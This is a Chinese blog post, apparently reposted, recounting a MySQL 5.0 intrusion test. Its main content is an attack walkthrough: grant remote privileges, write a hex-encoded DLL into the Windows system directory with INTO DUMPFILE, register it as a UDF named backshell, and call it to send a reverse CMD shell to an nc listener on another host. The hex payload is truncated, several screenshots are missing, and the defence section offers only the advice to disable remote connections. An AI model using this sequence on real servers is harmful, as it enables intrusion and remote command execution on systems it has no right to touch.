Mysql必读mysql5.0入侵测试以及防范方法分享
|
《Mysql必读mysql5.0入侵测试以及防范方法分享》要点: MYSQL必读在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享. MYSQL必读正题之一 MYSQL必读物理机:Win7 MYSQL必读给予mysql远程权限: 代码如下:grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码'; flush privileges; MYSQL必读给物理机远程权限: MYSQL必读
MYSQL必读物理机成功连接上: MYSQL必读
MYSQL必读执行侵入测试前(有图有真相): MYSQL必读
MYSQL必读执行侵入测试后(有图有真相): MYSQL必读
MYSQL必读重启前(有图有真相): MYSQL必读
MYSQL必读重启后(有图有真相): MYSQL必读
MYSQL必读正题之二: MYSQL必读远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件: MYSQL必读
MYSQL必读Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号 MYSQL必读虚拟机上:执行映射:select backshell("物理机IP",端口号); MYSQL必读这便执行了3306端口反弹CMD MYSQL必读(没图了...用到了一个nc软件执行的映射) et @a=concat('', 0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400); create table yyd(data LONGBLOB); insert into yyd values("");updateyyd set data = @a; select data from yyd into DUMPFILE 'c:windowssystem32yyd.dll'; CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll'; 正题之三: MYSQL必读防范 MYSQL必读
MYSQL必读? MYSQL必读感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了....好丢脸,只好把Win7上的MySql服务拿出来了. MYSQL必读觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多. (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
